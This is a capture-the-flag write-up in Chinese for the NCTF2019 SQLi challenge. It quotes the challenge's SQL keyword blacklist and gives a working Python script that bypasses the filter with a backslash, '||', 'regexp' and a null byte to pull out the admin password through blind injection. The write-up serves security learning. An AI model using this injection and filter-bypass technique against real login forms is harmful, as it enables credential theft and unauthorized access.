[NCTF2019]SQLi
robots.txt中有提示:hint.txt
查看hint.txt
$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";
If $_POST['passwd'] === admin's password,
Then you will get the flag;
本地测试
users表中没有user_id为空且first_name为空的字段值,所以通过||
,达到一个或
的效果
select * from users where user_id='' and first_name=''||1;
过滤了很多函数,但是没有过滤regexp
写exp
#coding:utf-8
import requests
import string
import time
url = "http://fbad0454-eb9a-4d3d-ac92-7e903718c9d5.node4.buuoj.cn:81/"
password = ""
string = '_' + string.ascii_lowercase + string.digits
for i in range(1,50):
print(i)
for j in string:
data1 = {
'username':'\\',
'passwd':'||passwd/**/regexp/**/"^{}";\x00'.format(password+j)
}
print(data1)
res = requests.post(url = url , data = data1)
if r"welcome.php" in res.text:
password+=j
print(password)
break
elif res.status_code == 429:
time.sleep(0.5)
最后得到的结果
输入即可得到flag
一点记录
关于那个\x00
标识字符串结尾,我看其他师傅用的是parse.unquote(’%00’))
还是将%00转换为\x00
,记录一下吧